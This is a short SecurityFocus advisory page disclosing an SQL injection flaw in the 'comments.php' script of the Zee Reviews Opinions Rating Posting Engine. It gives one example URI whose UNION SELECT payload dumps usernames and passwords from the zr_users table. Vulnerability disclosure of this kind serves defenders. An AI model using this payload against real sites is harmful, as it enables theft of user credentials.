Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Zee Reviews Opinions Rating Posting Engine PHP Script 'comments.php' SQL Injection Vulnerability

An attacker can exploit these issues via a browser.

The following example URI is available:

http://www.example.com/comments.php?ItemID=1+UNION+SELECT+CONCAT_WS(0x3a,username,password)+FROM+zr_users--







 

Privacy Statement
Copyright 2009, SecurityFocus